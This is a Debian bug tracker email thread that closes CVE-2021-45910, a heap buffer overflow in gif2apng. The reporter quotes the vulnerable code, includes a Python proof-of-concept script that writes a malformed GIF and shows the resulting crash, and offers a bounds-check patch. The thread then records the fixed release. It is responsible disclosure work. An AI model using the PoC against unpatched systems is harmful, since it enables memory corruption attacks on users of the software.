Bug#1002667: marked as done (gif2apng: CVE-2021-45910: Heap based buffer overflow in the main function)

To: havard.f.aasen@pfft.no (Håvard F. Aasen)
Subject: Bug#1002667: marked as done (gif2apng: CVE-2021-45910: Heap based buffer overflow in the main function)
From: "Debian Bug Tracking System" <owner@bugs.debian.org>
Date: Sun, 14 Aug 2022 15:51:05 +0000
Message-id: <[🔎] handler.1002667.D1002667.1660492032946.ackdone@bugs.debian.org>
Reply-to: 1002667@bugs.debian.org
References: <E1oNFpU-00BfTh-WF@fasolo.debian.org> <614169838.551654.1640558711489@office.mailbox.org>

Your message dated Sun, 14 Aug 2022 15:47:08 +0000
with message-id <E1oNFpU-00BfTh-WF@fasolo.debian.org>
and subject line Bug#1002667: fixed in gif2apng 1.9+srconly-3+deb11u1
has caused the Debian Bug report #1002667,
regarding gif2apng: CVE-2021-45910: Heap based buffer overflow in the main function
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact owner@bugs.debian.org
immediately.)


-- 
1002667: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002667
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems

--- Begin Message ---

To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: gif2apng: Heap based buffer overflow in the main function
From: Kolja Grassmann <koljagrassmann@mailbox.org>
Date: Sun, 26 Dec 2021 23:45:11 +0100 (CET)
Message-id: <614169838.551654.1640558711489@office.mailbox.org>

Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security

Dear Maintainer,

I found a heap overflow in the main function of the gif2apng application. The issue exists within the for loops in the following code from the main function in gif2apng.cpp:

          if (coltype == 2)
          {
            for (j=0; j<h0; j++)
            {
              k = j; if (interlaced) k = (j>h2) ? (j-h2)*2-1 : (j>h2/2) ? (j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8;
              src = buffer + j*w0;
              dst = frame0 + ((k+y0)*w + x0)*3;
              for (i=0; i<w0; i++, src++, dst+=3)
                if (!has_t || *src != t)
                  memcpy(dst, &pal_l[*src][0], 3);
            }
          }
          else
          {
            for (j=0; j<h0; j++)
            {
              k = j; if (interlaced) k = (j>h2) ? (j-h2)*2-1 : (j>h2/2) ? (j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8;
              src = buffer + j*w0;
              dst = frame0 + (k+y0)*w + x0;
              if (shuffle)
              {
                for (i=0; i<w0; i++, src++, dst++)
                  if (!has_t || *src != t)
                    *dst = sh[*src];
              }
              else
              {
                for (i=0; i<w0; i++, src++, dst++)
                  if (!has_t || *src != t)
                    *dst = *src;
              }
            }
          }

The variable frame0 points to a buffer of size w * h * 3 or size w * h depending on the code path. The buffer variable points to a buffer holding user controllable data from the provided gif file. The variables w0, h0, x0 and y0 are also read from the gif file provided to the program without any validation. By choosing these values in the right way it is possible to manipulate the address, that data is written to as well as the number of bytes that are copied to the destination.

I wrote the following poc script, which creates a poc.gif file:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")

sig = b"GIF87a"
w = b"\x10\x00"
h = b"\x10\x00"
flags_one = b"\x00"
bcolor = b"\x01"
aspect = b"\x01"

data = sig + w + h + flags_one + bcolor + aspect
f.write(data)

id = b"\x2c"
w0 = b"\xff\x00"
y0 = b"\x00\x00"
x0 = b"\xff\x00"
h0 = b"\x02\x00"
flags_two = b"\x00"

data = id + x0 + y0 + w0 + h0 + flags_two
f.write(data)

# DecodeLZW
mincode = b"\x07"
f.write(mincode)
for i in range(0,512):
    # Size value and byte we write to the buffer
    target_char = b"\x01" + b"A"
    f.write(target_char)
    # Resetting the values using "clearcode" to keep the code path as simple as
possible
    clear_code = b"\x01" + b"\x80"
    f.write(clear_code)
# Leaving function
target_char = b"\x00"
f.write(target_char)

f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")

f.close()

Executing the following on the package from the testing repository on Debian 10 lead to a memory corruption issue:
user@debian:~$ gif2apng -i0 poc.gif /dev/null

gif2apng 1.9 using ZLIB

Reading 'poc.gif'...
1 frames.
Writing 'poc.png'...
1 frames.
double free or corruption (out)
Abgebrochen

I have not looked into exploiting this bug. However as it allows us to write arbitrary data to an address outside of the intended buffer and as we have control over parts of the address as well as the data that is written, this could in my opinion be exploitable.

I did a rudimentary fix for this issue locally by doing a bounds check before entering the for loops. However I am not sure if this is the cleanest solution, as this does only adresses the buffer overflow and not the lack of sanity
checks performed on the image data. It could also use some more testing.

          if (coltype == 2)
          {
            for (j=0; j<h0; j++)
            {
              k = j; if (interlaced) k = (j>h2) ? (j-h2)*2-1 : (j>h2/2) ?
(j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8;
              src = buffer + j*w0;
              dst = frame0 + ((k+y0)*w + x0)*3;
              if ( ( (j*w0 + w0) > buffer_size) || ( ((((k+y0)*w + x0)*3) + w0
* 3 ) > imagesize) ||  ((((k+y0)*w + x0)*3) < 0 ) ||  ( (j*w0) < 0)) {
                printf("Something is wrong with the size values\n");
                exit(0);
              }
              for (i=0; i<w0; i++, src++, dst+=3)
                if (!has_t || *src != t)
                  memcpy(dst, &pal_l[*src][0], 3);
            }
          }
          else
          {
            for (j=0; j<h0; j++)
            {
              k = j; if (interlaced) k = (j>h2) ? (j-h2)*2-1 : (j>h2/2) ?
(j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8;
              src = buffer + j*w0;
              dst = frame0 + (k+y0)*w + x0;
              if ( ( (j*w0 + w0) > buffer_size) || ( (((k+y0)*w + x0) + w0 ) >
imagesize) ||  ((((k+y0)*w + x0)) < 0 ) ||  ( (j*w0) < 0)) {
                printf("Something is wrong with the size values\n");
                exit(0);
              }
              if (shuffle)
              {
                for (i=0; i<w0; i++, src++, dst++)
                  if (!has_t || *src != t)
                    *dst = sh[*src];
              }
              else
              {
                for (i=0; i<w0; i++, src++, dst++)
                  if (!has_t || *src != t)
                    *dst = *src;
              }
            }
          }


Best regards
Kolja




-- System Information:
Debian Release: 10.11
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gif2apng depends on:
ii  libc6       2.28-10
ii  libzopfli1  1.0.2-1
ii  zlib1g      1:1.2.11.dfsg-1

gif2apng recommends no packages.

Versions of packages gif2apng suggests:
pn  apng2gif  <none>

-- no debconf information

--- End Message ---

--- Begin Message ---

To: 1002667-close@bugs.debian.org
Subject: Bug#1002667: fixed in gif2apng 1.9+srconly-3+deb11u1
From: Debian FTP Masters <ftpmaster@ftp-master.debian.org>
Date: Sun, 14 Aug 2022 15:47:08 +0000
Message-id: <E1oNFpU-00BfTh-WF@fasolo.debian.org>
Reply-to: havard.f.aasen@pfft.no (Håvard F. Aasen)

Source: gif2apng
Source-Version: 1.9+srconly-3+deb11u1
Done: Håvard F. Aasen <havard.f.aasen@pfft.no>

We believe that the bug you reported is fixed in the latest version of
gif2apng, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 1002667@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Håvard F. Aasen <havard.f.aasen@pfft.no> (supplier of updated gif2apng package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Thu, 28 Jul 2022 23:21:32 +0200
Source: gif2apng
Architecture: source
Version: 1.9+srconly-3+deb11u1
Distribution: bullseye
Urgency: medium
Maintainer: Debian QA Group <packages@qa.debian.org>
Changed-By: Håvard F. Aasen <havard.f.aasen@pfft.no>
Closes: 1002667 1002668 1002687
Changes:
 gif2apng (1.9+srconly-3+deb11u1) bullseye; urgency=medium
 .
   * Non-maintainer upload.
   * CVE-2021-45909, Closes: #1002668:
     heap based buffer overflow in the DecodeLZW
   * CVE-2021-45910, Closes: #1002667:
     heap-based buffer overflow within the main function
   * CVE-2021-45911, Closes: #1002687:
     heap based buffer overflow in processing of delays in the main function
Checksums-Sha1:
 33e3f54d215b550b3db7baa5659af8016671a2cc 1976 gif2apng_1.9+srconly-3+deb11u1.dsc
 55b70a112416a5409ffc82e40ee4b6be5c05c75f 8972 gif2apng_1.9+srconly-3+deb11u1.debian.tar.xz
 9e79488104d6a0a994ccf69118cd04aa669c246c 5845 gif2apng_1.9+srconly-3+deb11u1_source.buildinfo
Checksums-Sha256:
 65826fa4e6786d220a42bf9fd611149bd93a977d2b0f63ff72c1b7f4c4477704 1976 gif2apng_1.9+srconly-3+deb11u1.dsc
 753476fd86ef70c12cbcfe0fbe828e692a12eb9f5467c6e87ab323b9337c8a78 8972 gif2apng_1.9+srconly-3+deb11u1.debian.tar.xz
 55188a21369a197ad21a9d26a8df1c83491b85df94df520b4614e0b0e24d3148 5845 gif2apng_1.9+srconly-3+deb11u1_source.buildinfo
Files:
 716545a1210a0702c2a2c3d3f297db46 1976 graphics optional gif2apng_1.9+srconly-3+deb11u1.dsc
 54a67e604f7d352314a6bce97ff7b655 8972 graphics optional gif2apng_1.9+srconly-3+deb11u1.debian.tar.xz
 e0d7b9ec1cc824ea68c615bac183c848 5845 graphics optional gif2apng_1.9+srconly-3+deb11u1_source.buildinfo

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEkjZVexcMh/iCHArDweDZLphvfH4FAmLvty4ACgkQweDZLphv
fH4gGBAA1z8shxzMrvlXOPNKtgij5Ggfb4Z64QzsebHcwK+pg0xvfAFv+yp18+oa
2nnZ3pTskWOOQ8fDoUl2FjTjTO1cXVp1EuZsty4diT4ndjDry+o5lHWNvasW7y+X
iIUoZbHOUshDSEF8ss1ihjMugijMR90tcRlX5rEuKvdRBhyLUYxFvuoQllSsIkdS
IPfvPAiCrn24m4slFHfsLLoQUMJS71On+IEjeGMGMf5vJAhokrgBDhzIgziXhc3t
hZSs/l0i2nGIuB9CmEQuHTbThBskCYEXoATeupYY6s3icPgBBC3F3lzykqiXaIsz
v3/nosv2CC1ljr+VPHRt3PhGszjYBw2VMcObV0SWsdeMP/7cKPxoKg8g83Kc8dLR
NgxwVdKdL+f14JRAZ+NrayxJknbC1GN5XC2P4ocwoJAEfiSq2cfoyHLVyIq6gwS4
ONkthyUhmJBlWl8xjE+WrgANqYCJRxmb6cZ8Rb47lWrhnRMVbWTkp/l2WRUvQuKj
wsMRqMf661870Vu431KjtFA2JAmcMx1aSiZu1QRHqzDJZ3FzY5aa2RIVfnYvk5vj
P9X8jpxELSihY8p6rZxYTspi9E4BibINTNODhLkfcrop2PGwas1iJkWRSP8pGv2Q
Ljz+r6fh1AL1KFyoSd27vWV1310PSezojyjQRuasPteQv7QQAxU=
=/CM4
-----END PGP SIGNATURE-----

--- End Message ---

Reply to:

Prev by Date: Bug#1017311: zfs-fuse: FTBFS: malloc.c:447:13: error: '__malloc_hook' undeclared (first use in this function); did you mean 'umem_malloc_hook'?
Next by Date: Bug#1002668: marked as done (gif2apng: CVE-2021-45909: Heap based buffer overflow in the DecodeLZW function)
Previous by thread: Bug#1002667: marked as done (gif2apng: CVE-2021-45910: Heap based buffer overflow in the main function)
Next by thread: Bug#1002668: marked as done (gif2apng: CVE-2021-45909: Heap based buffer overflow in the DecodeLZW function)
Index(es):
- Date
- Thread